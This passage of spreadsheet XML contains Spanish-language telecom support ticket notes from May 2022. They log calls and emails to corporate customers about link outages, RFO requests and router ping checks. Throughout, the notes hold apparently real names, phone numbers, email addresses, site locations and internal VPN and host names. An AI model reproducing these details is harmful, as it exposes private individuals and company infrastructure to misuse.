  </si>
  <si>
    <t>F4570557</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PAOLA PEREZ 43358013 NO RESPONDE,  SE INTENTARA LUEGO
-ID 1001118990</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 42105007 PARA DETERMINAR ESTADO DE LOS EQUIPOS Y/O REALIZAR PRUEBAS, NO CONTESTA; LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4570567</t>
  </si>
  <si>
    <t xml:space="preserve">			
WO OPEN                                			8:32
ALICIA TOBAR	78404534	2 HORAS	10:32:00
ADRIAN GUEVARA	78554469	3 HORAS	11:32:00
HUMBERTO CHIQUILLO	78523419	4 HORAS	12:32:00
OSCAR HERNANDEZ 	7855-0164	5 HORAS	13:32:00
JUAN RIVAS 	7606-7202	7 HORAS	15:32:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. FERNANDO ASUCENA 78591523 INFORMA QUE NO SE ENCUENTRA EN SITIO, SOLICITA TIEMPO PARA VALIDAR LOS EQUIPOS DE UM ...
ID: 1001033584</t>
  </si>
  <si>
    <t>F4570611</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO CABRERA 56395681 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001267270 - 1001267750</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 56395681 PARA CONSULTAR COMPORTAMIENTO DEL SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.
ADICIONAL PERSONAL DE GESTIÓN AE SIGUE VERIFICANDO SERVICIO CON APOYO DE BOCX</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE VALIDARÁ SERVICIO MAÑANA EN EL TRANSCURSO DEL DÍA A SOLICITUD DE CLIENTE (PUEDE SER A LAS 09:00AM)</t>
  </si>
  <si>
    <t>F4570632</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 50673006587  MENCIONA QUE SI CUENTAN CON ENERGIA, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001123865</t>
  </si>
  <si>
    <t>F4570633</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 12:52
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITU DE RFO || 90001801546T || SD1127407 || F4570633
BUENA TARDE
   SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
ID	TICKET
90001801546T
SD1127407 - F4570633
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SOFIA SANTOS 58269238 QUIEN SOLICITA RFO AL CORREO
 -- TANIA.SANTOS@CLARO.COM.GT --
-ID 1001188641</t>
  </si>
  <si>
    <t>F4570651</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR OLIVER CUX AL 30224426 ID 1001142182 PERO SE VALIDA QUE AL MISMO TIEMPO QUE FINALIZO LA LLAMADA LA GESTORA ODALIS INGRESO Y CONFIRMA EL CORRECTO FUNCIONAMIENTO, SE MUEVE DE ESTADO Y SE NOTIFICA AL GESTOR RAMOS.MARLON VIA SKYPE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OLIVER CUX  30224426 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001139000</t>
  </si>
  <si>
    <t>F4570680</t>
  </si>
  <si>
    <t>***--- SE HACE CONFERENCIA ENTRE CL EBNI Y BRYRON DEL CNOC --**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDNI BATIACHS 42176953 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 1001158637 - 1001158834</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN NORIEGA 58144374 PARA BRINDAR RETROALIMENTACION
-ID 1001157666 - 1001157753</t>
  </si>
  <si>
    <t>F4570732</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR IRIS BATZ AL 42137505 ID 1001208546 ATIENDE Y COMENTAN QUE ES EQUIVOCADO, SE LLAMA AL OTRO NUMERO 46266783 ID 1001208891 ATIENDE MANUELA WINACK  SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE AYER FUE EL INCONVENIENTE ENTRE 13:00 A 14:00 HORAS DONDE HUBO UN RESET EN EL CUAL PUEDE SER LA CAUSA DE LA CAÍDA Y AL DÍA DE HOY ESTA OPERATIVA Y CONFIRMA EL CIERRE FALLA PROCEDE EL CIERRE DE TICKET CON LA SD, SE NOTIFICA AL GESTOR WAGNER.POLANCO PARA EL CIERRE</t>
  </si>
  <si>
    <t>F4570773</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE PER NO SE OBTIENE RESPUESTA PARA VALIDAR EL SERVICIO
1001081576
QUEUE:
NAME: TO: 50376007740
NUMBER: 50376007740
DURATION: 0:00:28
STATE: DISCONNECTED [REMOTE DISCONNECT]
DETAILS: 50376007740
ASSOCIATED PROCESS:
IC SERVER: CEN-GT-CIC-02
IC USER: ELVYNLOPEZ
LOCAL DATE/TIME: 19/05/2022 23:21:55</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS - 73268685 MENCIONA  QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001142038</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SALVADOR NAVARRO 76007740 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO CARLOS - 73268685
-ID 1001141154</t>
  </si>
  <si>
    <t>F4570938</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 20 DE MAYO DE 2022 04:52
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ROBERTO LOPEZ AGUSTIN &lt;WALTERR.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI002826 ::: "PERDIDA DE PAQUETES"
BUENOS DÍAS ESTIMADO SR. CARRILLO.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL A CARGO NOS INDICA QUE DE NUESTRO LADO EL SERVICIO SE ENCUENTRA ACTIVO Y SIN EVENTOS.
PODRÍA APOYARNOS EN VALIDAR DESDE SU LADO NUEVAMENTE E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 55 5174 5290 REPONDE GUADALUPE MENCIONA QUE YA ESTA CERRADO EL TICKET INTERNO
-ID 1001151345</t>
  </si>
  <si>
    <t>F4571004</t>
  </si>
  <si>
    <t>SE CONTACTA CARLOS SOLARES DEL 22276400 ID 1001105145 PARA EL SEGUIMIENTO DEL TICKET, SE VALIDA QUE TIENEN PRUEBAS PENDIENTES DE VALIDAR EL SERVICIO POR LO QUE SE TRANSFIERE AL 8126 ID 1001105536 CON EL GESTOR JOSE.OCHOA ATIENDE JHONSER QUIEN COMENTA QUE VALIDA CON EL GESTOR PERO INDICA QUE ESTA OCUPADO EL GESTOR Y EL BRINDARA EL APOYO. SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>F4571072</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL MARIA MARTINEZ 50163597 ID: 1001155107 INDICA QUE AUN TIENE CAIDO EL SERVICIO, SE CONTACTA A CNOC 8126 ATIENDE DARWIN E INDICA QUE GESTOR JOSE.OCHOA ESTA EN OTRA LLAMADA, POR LO QUE APOYARÁ ÉL, SE DEJA EN CONFERENCIA CLIENTE/GESTOR DARWIN*/*/*/*</t>
  </si>
  <si>
    <t>F4571106</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 11:55
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; WALTER R. BANEGAS &lt;WALTERB@BANPAIS.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; 'MAILTO:CARLOSE.GODINEZ@CLARO.COM.GT' &lt;IMCEAINVALID-+27MAILTO+3ACARLOSE+2EGODINEZ+40CLARO+2ECOM+2EGT+27@CORREO.AMERICAMOVIL.CA1&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;
CC: 'GRUPO OPERACIONES DATA CENTER / BANPAIS' &lt;DATACENTER@BANPAIS.HN&gt;; 'GRUPO DE COMUNICACIONES BP / BANPAIS' &lt;COMUNICACIONES@BANPAIS.HN&gt;; 'GRUPO MONITOREO Y DESPACHO / BANPAIS' &lt;MONITOREO_DESPACHO@BANPAIS.HN&gt;
ASUNTO: RE: ENLACE CAIDO WAN-CLARO :: INTERNET :: RESPALDO :: CID ::704369OH
*-*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4571109</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 58254420 PARA SEGUIMIENTO, NO CONTESTA; SE LE PIDE APOYO CON LAS PRUEBAS QUE GESTIÓN N1 LE SOLICITÓ VÍA CORREO.
ASUNTO: RE: FWD: FWD: WARNING: MESSAGE 1NMRYX-0006R7-KY DELAYED 24 HOURS</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON AUGUSTO PÉREZ/CLIENTE 58254420 SE LE PIDE APOYO A QUE NOS BRINDE DETALLES DE LO REPORTADO EN CORREO QUE LE ENVIÓ GESTIÓN N1, INDICA QUE EL PROBLEMA PERSISTE DESDE HACE 3 MESES, PERO EXPONDRÁ DETALLES ASEGURÓ SIGUIENDO LA COLA DE CORREOS.
ASUNTO: RE: FWD: FWD: WARNING: MESSAGE 1NMRYX-0006R7-KY DELAYED 24 HOURS</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO TIENE MOVIMIENTO LA FALLA DESDE EL DIA DE AYER 23/05/2022 14:39:15  POR LO QUE SE MUEVE A WIP FAVOR DE INDICAR QUE ES LO QUE FALTA PARA NO CAMBIARLO POR FAVOR, SE LE NOTIFICA AL GESTOR JURGEN.BOCH VIA SKYPE Y BRINDAR EL SEGUIMIENTO QUE CORRESPONDE.</t>
  </si>
  <si>
    <t>F4571116</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, EN MONITOREO PARA LAS 15:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4571120</t>
  </si>
  <si>
    <t>PERDIDA DE ENLACE DE DATOS
SE RESPONDE CORREO A CLIENTE</t>
  </si>
  <si>
    <t>F4571122</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDIN ALONZO 41498608 MENCIONA QUE EL PROBLEMA ES CON EL WIFI, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001095108</t>
  </si>
  <si>
    <t>F4571129</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LYNSIE CHAVEZ 33927547 PERO NO RESPONDE, SE INTENTARA  LUEGO
-ID  1001149745 - 1001150115 - 1001150781</t>
  </si>
  <si>
    <t>F4571136</t>
  </si>
  <si>
    <t>SE LLAMA MARDOQUEO PARA SOLICITAR DATOS E INDICARLE QUE AFECTACION ES DESDE NODO PERO SIN EMBARGO ENVIA A BUZON.</t>
  </si>
  <si>
    <t>SE LLAMA A MARDOQUEO BONILLA 56943262 ID: 1001113380
SE DEJA EN CONFERENCIA CON YENSI.CALGUA PARA SOLICITAR DATOS DE VISITA | WIP</t>
  </si>
  <si>
    <t>F4571137</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL AREA DE MONITOREO DE CAJEROS, RESPONDE DANIEL QUIEN ME INDICA QUE EL CAJERO FUE RETIRADO EL 20 DE MAYO DEL 2022.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 17:08
FIN: HOY, 17:14
DURACIÓN: 6:14
ID DE LLAMADA: 1001757353</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: VIERNES, 20 DE MAYO DE 2022 9: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901
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM19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1137
ID: 47501616T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1901
UBICADO EN: CAJERO 1901 GASOLINERA PUMA SANARATE, KM.56.5 RUTA AL ATLANTICO SANARATE EL PROGRESO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 23 DE MAYO DE 2022 17:53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1901
ESTIMADO CLIENTE,
VÍA LLAMADA TELEFÓNICA NOS CONFIRMAN SOBRE EL RETIRO DEFINITIVO DEL CAJERO LA FECHA: 20/05/22, SOLICITAMOS SU APOYO PARA QUE NOS LO CONFIRMEN VÍA CORREO ELECTRÓNICO PARA PROCEDER CON EL BLOQUEO DEL MONITOREO PROACTIVO.
TICKET: F4571137
ID: 47501616T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1901
UBICADO EN: CAJERO 1901 GASOLINERA PUMA SANARATE, KM.56.5 RUTA AL ATLANTICO SANARATE EL PROGRESO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4571139</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN Y CONTESTA SRITA AMILIA- ## REALIZA PRUEBAS EN LLAMADAS SE PASA CASO A PC</t>
  </si>
  <si>
    <t>LCIENTE EN PR REALIZA PRUEBAS Y VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4571146</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
VIE 20/05/2022 8:56 A.M.
PARA:
JOSE.GAITAN@WALMART.COM;
CAM-CCINFR@WAL-MART.COM;
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTON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1146
ID: 344400092T¿
IDENTIFICADOR DEL CLIENTE: CC_WALMART_GT_TIENDA_0044
PAIZ 18 CALLE, 18 CALLE 6-85 ZONA 1¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4571149</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE  JENNY PINEDA, INIDICA QUE NO ENCONTRO INFORMACION DEL CASO POR LO QUE SE CONTACTARA A EJECUTIVA
1001100037
COLA:
NOMBRE: A: 0050325912160
NÚMERO: 0050325912160
DURACIÓN: 0:02:11
ESTADO: CONECTADA
DETALLES: 0050325912160
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 20/05/2022 08:40:32</t>
  </si>
  <si>
    <t>F4571153</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE OTTONIEL CAAL 59316909  MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN PERO SOLICITA LLAMADA PARA LAS 11:00 HRS
-ID 1001122648</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTONIEL CAAL 59316909 QUIEN  CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001162913</t>
  </si>
  <si>
    <t>F4571158</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE RAUL CANO 58261614 QUIEN SOLICITA HABLAR CON JOSE  OCHOA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001173770</t>
  </si>
  <si>
    <t>SE HABLÓ CON RAÚL CANO/CLIENTE 58261614 SE LE INFORMA LO DICHO EN CRONO ANTERIOR, SIN EMBARGO INDICA QUE AÚN PERSISTE LO REPORTADO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA JOSÉ OCHOA/GESTOR; EN LÍNEA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE PLATICA CON CLEINTE RAUL CANO, COMENTA QUE SI SE REALIZAN CONFIGURACIONES, SOLICITA QUE NO SE PUEDE DEJAR SIN SERVICIO MAS DE 10 MINUTOS YA QUE HAY PERSONAL TRABAJANDO EN SITIO, QUE SI ES MAS TARDADO DE LOS ESPERADO QUE MEJOR SE COORDINE PARA LAS 10:OO PM.
RESULTADO: LLAMADA HECHA
NOMBRE: 58261614
NÚMERO: 58261614
INICIO: HOY, 18:45
FIN: HOY, 18:49
DURACIÓN: 3:43
ID DE LLAMADA: 1001778062</t>
  </si>
  <si>
    <t>SE ENTRABA COMUNICACION CON LIDER KEVYN FONSECA Y CLIENTE RAUL CANO, SE LE COMENTA QUE ES NECESARIO INTERVENIR EL SERVICIO APROXIMADAMENTE 1 HORA, POR LO QUE CLIENTE ESTARA LLAMANDO PARA REALIZAR LA INERVENCION EN ESTOS MOMENTOS O MAS TARDE, QUEDAMOS AL PENDIENTE DE CLIENTE
1001782285
COLA:
NOMBRE: A: 41284612
NÚMERO: 41284612
DURACIÓN: 0:07:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 41284612
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 23/05/2022 19:27:56</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL CANO 58261614 INDICA QUE AUN CUENTA CON INCONVENIENTES || SE NOTIFICA A GESTOR **
ID 1001565756
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SATURACIÓN INTERNA EN CLIENTE; SE DEBE VALIDAR SERVICIO HASTA EL DÍA LUNES A LAS 08:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4571164</t>
  </si>
  <si>
    <t>CLIENTE SR. MARCO ROSAS VALIDA EQUIPOS ENCENDIDOS, APLICO REINICIO PERO ENLACE CONTINUA CAIDO:</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CC EDY BENITO COMUNICA A CLIENTE SR. MARCO ROSAS, SE PROCEDE A DIAGNOSTICAS Y APOYAR A CLIENTE EN ESTE MOMENTO.</t>
  </si>
  <si>
    <t>F4571165</t>
  </si>
  <si>
    <t>VALIDA: WILLIAM MANCHO 66322200 ID: 1001117464.</t>
  </si>
  <si>
    <t>SE OBSERVA QUE ENLACE YA LEVANTO DESPUES DEL REINICIO:
&lt;GMIXGTMVN1T1B03B02EIM4&gt;PING -VPN-INSTANCE CAMPERO_XT 10.78.51.125
  PING 10.78.51.125: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.78.51.125: BYTES=56 SEQUENCE=1 TTL=255 TIME=5 MS
    REPLY FROM 10.78.51.125: BYTES=56 SEQUENCE=2 TTL=255 TIME=5 MS
    REPLY FROM 10.78.51.125: BYTES=56 SEQUENCE=3 TTL=255 TIME=4 MS
    REPLY FROM 10.78.51.125: BYTES=56 SEQUENCE=4 TTL=255 TIME=4 MS
    REPLY FROM 10.78.51.125: BYTES=56 SEQUENCE=5 TTL=255 TIME=5 MS
  --- 10.78.51.125 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/5 MS
&lt;GMIXGTMVN1T1B02B02EIM3&gt;PING -VPN ADMIN_RAD_ISLAS_METRO 10.78.5.236
  PING 10.78.5.236: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.78.5.236: BYTES=56 SEQUENCE=1 TTL=64 TIME=5 MS
    REPLY FROM 10.78.5.236: BYTES=56 SEQUENCE=2 TTL=64 TIME=5 MS
    REPLY FROM 10.78.5.236: BYTES=56 SEQUENCE=3 TTL=64 TIME=5 MS
    REPLY FROM 10.78.5.236: BYTES=56 SEQUENCE=4 TTL=64 TIME=4 MS
    REPLY FROM 10.78.5.236: BYTES=56 SEQUENCE=5 TTL=64 TIME=5 MS
  --- 10.78.5.236 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/5 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENCARGADA / O DE LUGAR WILLIAM MANCHO 66322200 VALIDA EQUIPOS ENCENDIDOS APLICA REINICIO PERO ENLACE NO LEVANTA.</t>
  </si>
  <si>
    <t>F4571166</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELA CRUZ 33575448 QUIEN REINICIA LOS EQUIPOS Y LUEGO DE ELLO EL SERVICIO RESTABLECE
CLIENTE MENCIONA QUE PRESENTA PROBLEMA CON EL ANCHO DE BANDA  POR LO QUE SOLICITA  LLAMADA PARA LAS 12:00 HRS
-ID 1001105545</t>
  </si>
  <si>
    <t>F4571168</t>
  </si>
  <si>
    <t>SE ESCALÓ CON ALBERTO TRUJILLO/TÉCNICO 58263017 INDICA QUE YA ESTÁ EN PR HACIENDO LAS REVISIONES, AVANCES EN UNA HORA; ADICIONAL SE LLAMÓ A CENTRAL 55312227 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>SE LLAMO A MARCOS PARA REALIZAR PRUEBAS DE PRIMER NIVEL SIN EMBARGO NO RESPONDE--
55312227</t>
  </si>
  <si>
    <t>F4571169</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A CLIENTE JOSUE BARAHONA 31905931, CLIENTE INDICA QUE EL DÍA DE AYER HUBO UN APAGON DE ENERGÍA Y LUEGO DE ESO EL E1 YA NO LEVANTÓ, SE LE SOLICITA AL CLIENTE REINICIAR SU PLANTA PBX Y EL EQUIPO IMC, PERO COMENTA QUE EL IMC NO TIENE NINGUNA LUZ ENCENDIDA, CLIENTE INDICA QUE YA VERIFICÓ EL EQUIPO EN OTRO TOMACORRIENTE PERO SIGUE EN EL MISMO ESTADO. SE COORDINARÁ VISITA. ID:1001116575</t>
  </si>
  <si>
    <t>F4571178</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE NELSON TREJOS  87869705 QUIEN SOLICITA SE PUEDA ENVIAR POR CORREO EL DIAGNOSTICO DETALLADO AL CORREO -- TELEMATICA@BACCREDOMATIC.NI --
SOLICITA SE COLOQUE SI SE PRESENTO:  SATURACION  -  CAIDAS
-ID 1001128622</t>
  </si>
  <si>
    <t>F4571179</t>
  </si>
  <si>
    <t>F4571183</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDERICK MUÑOZ 42195266
-ID 1001168946
NOMBRE DEL CLIENTE:TRANSPORTES LA CEIBA, S.A.
DIRECCION: KM. 20 CARRETERA A LINDA VISTA ZONA 4 VILLA NUEVA
HORARIO DE CLIENTE: HASTA LAS 16:00
CONTACTO EN SITIO: FREDERICK MUÑOZ 42195266
GESTION DE PERMISOS:UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SERVICIO ALARMADO CON INGRESO DE ERRORES, GESTIÓN AE ESCALÓ CON BOTX PARA VERIFICAR LA RUTA; ADICIONAL SE LLAMÓ/HABLÓ CON FREDERICK MÚÑOZ/CLIENTE 42195266 Y SE LE BRINDAN AVANCES DEL TICKET.
ADICIONAL SE CONSULTA AVANCES DEL TICKET A GESTIÓN AE VÍA SKYPE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA FREDERICK MUÑOZ 42195266   ADELANTAR LAS PRUEBAS, SIN EMBARGO NO SE TIENE RESPUESTA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4571197</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR LAZARO / ENCARGADO 44076125 23215011 ID: 1001165130 SE CONTACTA A GESTOR JOSE.OCHOA Y NO RESPONDE, SE CONTACTA A CNOC 8126 ATIENDE GESTOR DARWIN.ESPAÑA Y APOYA SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*</t>
  </si>
  <si>
    <t>F4571206</t>
  </si>
  <si>
    <t>SE REALIZA SOLICITUD DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 9:22
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || FUNDACION GENESIS EMPRESARIAL || 245700031T || SD1127158
BUEN DÍA
   SOLICITO DE SU AMABLE APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA	ID 	TICKET
FUNDACION GENESIS EMPRESARIAL
245700031T
SD1127158
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE VALIDA QUE SE REAPERTURA TICKET PARA RFO, ESTADO DE TICKET NO CORRESPONDE A PC POR LO QUE SE MUEVE Y SE LE NOTIFICA AL GESTOR DARWINH.ESPANA VIA SKYPE</t>
  </si>
  <si>
    <t>F4571208</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL BLADIMIR SANTAY 77718769 ID: 1001170743 VALIDA SERVICIO OK Y AUTORIZA EL CIERRE DEL TICKET*/*/*/*SE NOTIFICA A GESTOR MIGUELAN.RODRIGUEZ POR SKYPE Y SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>F4571214</t>
  </si>
  <si>
    <t>SE CONTACTA EL CL KEIVIN POINTAN PARA EL SEGUIMIENTO DEL TICKET SE VALIDA QUE ESTA PC SE CONTACTA CON EL GESTOR A CARGO    SAMUEL.ESTRADAG AL 8126 ID 1001221737 SE LE BRINDA LA INFORMACIÓN Y SE DEJA CON EL CL EN LINEA</t>
  </si>
  <si>
    <t>F4571226</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MORALES 24210880 EXT 129 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001195804</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN MORALES AL 24210880 EXT 129 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001979703
**</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE CRISTIAN SOLICITA AVANCES, SE VALIDA QUE NO HAY RESPUESTA DEL CPE, CLIENTE INDICA QUE SI PUEDE APOYAR CON PRUEBAS POR LO QUE SE CONTACTA A GESTOR MARLON RAMOS Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/*</t>
  </si>
  <si>
